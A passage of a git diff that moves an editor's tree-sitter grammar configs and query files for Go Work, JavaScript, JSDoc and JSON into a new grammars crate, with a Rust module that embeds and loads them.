@structure.close) + +(module_directive + "module" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(replace_directive + "replace" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(retract_directive + "retract" @structure.anchor + "(" @structure.open + ")" @structure.close) + +(ignore_directive + "ignore" @structure.anchor + "(" @structure.open + ")" @structure.close) diff --git a/crates/languages/src/gowork/config.toml b/crates/grammars/src/gowork/config.toml similarity index 88% rename from crates/languages/src/gowork/config.toml rename to crates/grammars/src/gowork/config.toml index 
68beb073ab64df4761bf3f87a88f28a0608656f7..90e62f0cf102306b258e9efd56bb9ae9838f0f27 100644 --- a/crates/languages/src/gowork/config.toml +++ b/crates/grammars/src/gowork/config.toml @@ -2,7 +2,7 @@ name = "Go Work" code_fence_block_name = "gowork" grammar = "gowork" path_suffixes = ["work"] -line_comments = ["//"] +line_comments = ["// "] autoclose_before = ")" brackets = [ { start = "(", end = ")", close = true, newline = true} diff --git a/crates/languages/src/gowork/highlights.scm b/crates/grammars/src/gowork/highlights.scm similarity index 76% rename from crates/languages/src/gowork/highlights.scm rename to crates/grammars/src/gowork/highlights.scm index 9c84bcc4496394817190a86fa8cd4995b39475a2..b9d3d42e630c5c4f4eb877a330a15371ceb4d96a 100644 --- a/crates/languages/src/gowork/highlights.scm +++ b/crates/grammars/src/gowork/highlights.scm @@ -9,6 +9,6 @@ (comment) @comment [ -(version) -(go_version) + (version) + (go_version) ] @string diff --git a/crates/grammars/src/gowork/injections.scm b/crates/grammars/src/gowork/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/gowork/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/grammars.rs b/crates/grammars/src/grammars.rs new file mode 100644 index 0000000000000000000000000000000000000000..00d6e6281c45b10a5dcfbd188b5848c63cc0cd75 --- /dev/null +++ b/crates/grammars/src/grammars.rs @@ -0,0 +1,108 @@ +use anyhow::Context as _; +use language_core::{LanguageConfig, LanguageQueries, QUERY_FILENAME_PREFIXES}; +use rust_embed::RustEmbed; +use util::asset_str; + +#[derive(RustEmbed)] +#[folder = "src/"] +#[exclude = "*.rs"] +struct GrammarDir; + +/// Register all built-in native tree-sitter grammars with the provided registration function. +/// +/// Each grammar is registered as a `(&str, tree_sitter_language::LanguageFn)` pair. 
+/// This must be called before loading language configs/queries. +#[cfg(feature = "load-grammars")] +pub fn native_grammars() -> Vec<(&'static str, tree_sitter::Language)> { + vec![ + ("bash", tree_sitter_bash::LANGUAGE.into()), + ("c", tree_sitter_c::LANGUAGE.into()), + ("cpp", tree_sitter_cpp::LANGUAGE.into()), + ("css", tree_sitter_css::LANGUAGE.into()), + ("diff", tree_sitter_diff::LANGUAGE.into()), + ("go", tree_sitter_go::LANGUAGE.into()), + ("gomod", tree_sitter_go_mod::LANGUAGE.into()), + ("gowork", tree_sitter_gowork::LANGUAGE.into()), + ("jsdoc", tree_sitter_jsdoc::LANGUAGE.into()), + ("json", tree_sitter_json::LANGUAGE.into()), + ("jsonc", tree_sitter_json::LANGUAGE.into()), + ("markdown", tree_sitter_md::LANGUAGE.into()), + ("markdown-inline", tree_sitter_md::INLINE_LANGUAGE.into()), + ("python", tree_sitter_python::LANGUAGE.into()), + ("regex", tree_sitter_regex::LANGUAGE.into()), + ("rust", tree_sitter_rust::LANGUAGE.into()), + ("tsx", tree_sitter_typescript::LANGUAGE_TSX.into()), + ( + "typescript", + tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into(), + ), + ("yaml", tree_sitter_yaml::LANGUAGE.into()), + ("gitcommit", tree_sitter_gitcommit::LANGUAGE.into()), + ] +} + +/// Load and parse the `config.toml` for a given language name. +pub fn load_config(name: &str) -> LanguageConfig { + let config_toml = String::from_utf8( + GrammarDir::get(&format!("{}/config.toml", name)) + .unwrap_or_else(|| panic!("missing config for language {:?}", name)) + .data + .to_vec(), + ) + .unwrap(); + + let config: LanguageConfig = ::toml::from_str(&config_toml) + .with_context(|| format!("failed to load config.toml for language {name:?}")) + .unwrap(); + + config +} + +/// Load and parse the `config.toml` for a given language name, stripping fields +/// that require grammar support when grammars are not loaded. 
+pub fn load_config_for_feature(name: &str, grammars_loaded: bool) -> LanguageConfig { + let config = load_config(name); + + if grammars_loaded { + config + } else { + LanguageConfig { + name: config.name, + matcher: config.matcher, + jsx_tag_auto_close: config.jsx_tag_auto_close, + ..Default::default() + } + } +} + +/// Get a raw embedded file by path (relative to `src/`). +/// +/// Returns the file data as bytes, or `None` if the file does not exist. +pub fn get_file(path: &str) -> Option { + GrammarDir::get(path) +} + +/// Load all `.scm` query files for a given language name into a `LanguageQueries`. +/// +/// Multiple `.scm` files with the same prefix (e.g. `highlights.scm` and +/// `highlights_extra.scm`) are concatenated together with their contents appended. +pub fn load_queries(name: &str) -> LanguageQueries { + let mut result = LanguageQueries::default(); + for path in GrammarDir::iter() { + if let Some(remainder) = path.strip_prefix(name).and_then(|p| p.strip_prefix('/')) { + if !remainder.ends_with(".scm") { + continue; + } + for (prefix, query) in QUERY_FILENAME_PREFIXES { + if remainder.starts_with(prefix) { + let contents = asset_str::(path.as_ref()); + match query(&mut result) { + None => *query(&mut result) = Some(contents), + Some(existing) => existing.to_mut().push_str(contents.as_ref()), + } + } + } + } + } + result +} diff --git a/crates/grammars/src/javascript/brackets.scm b/crates/grammars/src/javascript/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..69acbcd614e440d8e8e2010f1677e52cb651e15e --- /dev/null +++ b/crates/grammars/src/javascript/brackets.scm @@ -0,0 +1,29 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +("<" @open + "/>" @close) + +("" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/javascript/config.toml b/crates/grammars/src/javascript/config.toml similarity index 97% rename from crates/languages/src/javascript/config.toml rename to crates/grammars/src/javascript/config.toml index 265f362ce4b655371471649c03c5a4a201da320c..118024494a7b8f98bcff9354fd3d27f4fc1dcfc4 100644 --- a/crates/languages/src/javascript/config.toml +++ b/crates/grammars/src/javascript/config.toml @@ -1,6 +1,7 @@ name = "JavaScript" grammar = "tsx" path_suffixes = ["js", "jsx", "mjs", "cjs"] +modeline_aliases = ["js", "js2"] # [/ ] is so we match "env node" or "/node" but not "ts-node" first_line_pattern = '^#!.*\b(?:[/ ]node|deno run.*--ext[= ]js)\b' line_comments = ["// "] @@ -23,7 +24,6 @@ tab_size = 2 scope_opt_in_language_servers = ["tailwindcss-language-server", "emmet-language-server"] prettier_parser_name = "babel" debuggers = ["JavaScript"] -import_path_strip_regex = "(?:/index)?\\.[jt]s$" [jsx_tag_auto_close] open_tag_node_name = "jsx_opening_element" diff --git a/crates/grammars/src/javascript/debugger.scm b/crates/grammars/src/javascript/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8f384fd8ad9e07fea89972464e64b905086bf580 --- /dev/null +++ b/crates/grammars/src/javascript/debugger.scm @@ -0,0 +1,51 @@ +(lexical_declaration + (variable_declarator + name: (identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? 
@debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/javascript/highlights.scm b/crates/grammars/src/javascript/highlights.scm similarity index 61% rename from crates/languages/src/javascript/highlights.scm rename to crates/grammars/src/javascript/highlights.scm index 5fb31ce100b5884d99d3e941ce6fb67b69ff2cfd..f6354dd3a016f544e5be1616c3dfb12144855775 100644 --- a/crates/languages/src/javascript/highlights.scm +++ b/crates/grammars/src/javascript/highlights.scm @@ -1,56 +1,33 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? - @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? 
@type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -59,36 +36,58 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? 
@constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -121,6 +120,7 @@ ; Special identifiers ; (type_identifier) @type + (predefined_type) @type.builtin (class_declaration @@ -133,12 +133,12 @@ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -163,11 +163,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -224,7 +225,8 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) [ "(" @@ -233,20 +235,18 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (ternary_expression [ "?" 
":" - ] @operator -) + ] @operator) [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -293,6 +293,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -310,7 +311,8 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) (template_substitution "${" @punctuation.special @@ -320,44 +322,70 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) ; JSX elements (jsx_opening_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_self_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) - -(jsx_opening_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_self_closing_element (identifier) @tag.jsx (#match? 
@tag.jsx "^[a-z][^.]*$")) -(jsx_attribute (property_identifier) @attribute.jsx) -(jsx_opening_element (["<" ">"]) @punctuation.bracket.jsx) -(jsx_closing_element ([""]) @punctuation.bracket.jsx) -(jsx_self_closing_element (["<" "/>"]) @punctuation.bracket.jsx) -(jsx_attribute "=" @punctuation.delimiter.jsx) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + +(jsx_opening_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_self_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_attribute + (property_identifier) @attribute.jsx) + +(jsx_opening_element + ([ + "<" + ">" + ]) @punctuation.bracket.jsx) + +(jsx_closing_element + ([ + "" + ]) @punctuation.bracket.jsx) + +(jsx_self_closing_element + ([ + "<" + "/>" + ]) @punctuation.bracket.jsx) + +(jsx_attribute + "=" @punctuation.delimiter.jsx) + (jsx_text) @text.jsx + (html_character_reference) @string.special diff --git a/crates/grammars/src/javascript/indents.scm b/crates/grammars/src/javascript/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..1e72160bca2f5fd04ce6d3bc7b02e9ab029eb018 --- /dev/null +++ b/crates/grammars/src/javascript/indents.scm @@ -0,0 +1,33 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + (if_statement) + (for_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +(jsx_opening_element + ">" @end) @indent + +(jsx_element + (jsx_opening_element) @start + (jsx_closing_element)? 
@end) @indent diff --git a/crates/grammars/src/javascript/injections.scm b/crates/grammars/src/javascript/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..8ccfc5028dea453013134c52db885d51ab2f673b --- /dev/null +++ b/crates/grammars/src/javascript/injections.scm @@ -0,0 +1,144 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? @_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string) @injection.content + (#set! injection.language "html")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! 
injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! 
injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! injection.language "css")) diff --git a/crates/grammars/src/javascript/outline.scm b/crates/grammars/src/javascript/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..7b8e4b2d46c9b88e6b719ceea5bb64eeb19af518 --- /dev/null +++ b/crates/grammars/src/javascript/outline.scm @@ -0,0 +1,269 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(function_declaration + "async"? @context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item))) + +; Exported array destructuring +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ]))))) + +; Exported object destructuring +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + 
]))))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . 
+ [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#eq? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/languages/src/javascript/overrides.scm b/crates/grammars/src/javascript/overrides.scm similarity index 79% rename from crates/languages/src/javascript/overrides.scm rename to crates/grammars/src/javascript/overrides.scm index 6dbbc88ef924c2cac65aaf9ff7e7dba87b99a359..4707e2a89fdd246de8d0152d6284e188caaf539e 100644 --- a/crates/languages/src/javascript/overrides.scm +++ 
b/crates/grammars/src/javascript/overrides.scm @@ -2,7 +2,8 @@ (string) @string -(template_string (string_fragment) @string) +(template_string + (string_fragment) @string) (jsx_element) @element diff --git a/crates/grammars/src/javascript/runnables.scm b/crates/grammars/src/javascript/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..b410fb4d8cadd879f657f20a4685cf3bf834ad86 --- /dev/null +++ b/crates/grammars/src/javascript/runnables.scm @@ -0,0 +1,42 @@ +; Add support for (node:test, bun:test and Jest) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#eq? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! 
tag js-test)) diff --git a/crates/grammars/src/javascript/textobjects.scm b/crates/grammars/src/javascript/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..f1cc9c9491e20320d193de5dec2a9c438cee5dcc --- /dev/null +++ b/crates/grammars/src/javascript/textobjects.scm @@ -0,0 +1,91 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? @function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration (captures body for expression-bodied arrows) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) +((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + [ + (_) + ";"? 
+ ]* @class.inside + "}")) @class.around diff --git a/crates/grammars/src/jsdoc/brackets.scm b/crates/grammars/src/jsdoc/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..0f6ce4bf3d4c9c903d092fc669a416e83c44e82d --- /dev/null +++ b/crates/grammars/src/jsdoc/brackets.scm @@ -0,0 +1,5 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) diff --git a/crates/languages/src/jsdoc/config.toml b/crates/grammars/src/jsdoc/config.toml similarity index 100% rename from crates/languages/src/jsdoc/config.toml rename to crates/grammars/src/jsdoc/config.toml diff --git a/crates/languages/src/jsdoc/highlights.scm b/crates/grammars/src/jsdoc/highlights.scm similarity index 97% rename from crates/languages/src/jsdoc/highlights.scm rename to crates/grammars/src/jsdoc/highlights.scm index 581b5d8111fe25443de9951cfdddc8c277ad83ff..4b5657cb2d3fa6651e2e2b7eb495c095c0ae8482 100644 --- a/crates/languages/src/jsdoc/highlights.scm +++ b/crates/grammars/src/jsdoc/highlights.scm @@ -1,3 +1,5 @@ (tag_name) @keyword.jsdoc + (type) @type.jsdoc + (identifier) @variable.jsdoc diff --git a/crates/grammars/src/json/brackets.scm b/crates/grammars/src/json/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..ac2e2ad37bfc6cd2e72323914f6975c5d3cdb60e --- /dev/null +++ b/crates/grammars/src/json/brackets.scm @@ -0,0 +1,9 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/json/config.toml b/crates/grammars/src/json/config.toml similarity index 88% rename from crates/languages/src/json/config.toml rename to crates/grammars/src/json/config.toml index fcae481bebbdff01957c55190266af545f346327..e2999b2df58cfe2ed648c6c57f6d526dde5599de 100644 --- a/crates/languages/src/json/config.toml +++ b/crates/grammars/src/json/config.toml @@ -1,6 +1,6 @@ name = "JSON" grammar = "json" -path_suffixes = ["json", "flake.lock", "geojson", "prettierrc"] +path_suffixes = ["json", "flake.lock", "geojson", "prettierrc", "json.dist"] line_comments = ["// "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/jsonc/highlights.scm b/crates/grammars/src/json/highlights.scm similarity index 99% rename from crates/languages/src/jsonc/highlights.scm rename to crates/grammars/src/json/highlights.scm index 1098320ccba78c143b43c7608b1d4e41ad5ec20d..f9b1c337358d26f08fe5b77b3a6e1a70b3f5b418 100644 --- a/crates/languages/src/jsonc/highlights.scm +++ b/crates/grammars/src/json/highlights.scm @@ -1,6 +1,7 @@ (comment) @comment (string) @string + (escape_sequence) @string.escape (pair diff --git a/crates/grammars/src/json/indents.scm b/crates/grammars/src/json/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..63b015c2fe74dda013e201d88ebbfe06107def4a --- /dev/null +++ b/crates/grammars/src/json/indents.scm @@ -0,0 +1,5 @@ +(array + "]" @end) @indent + +(object + "}" @end) @indent diff --git a/crates/grammars/src/json/outline.scm b/crates/grammars/src/json/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c7f988077767819128b6f028fbcf196dcf5a5678 --- /dev/null +++ b/crates/grammars/src/json/outline.scm @@ -0,0 +1,3 @@ +(pair + key: (string + (string_content) @name)) @item diff --git a/crates/languages/src/json/overrides.scm b/crates/grammars/src/json/overrides.scm similarity index 100% rename from crates/languages/src/json/overrides.scm rename 
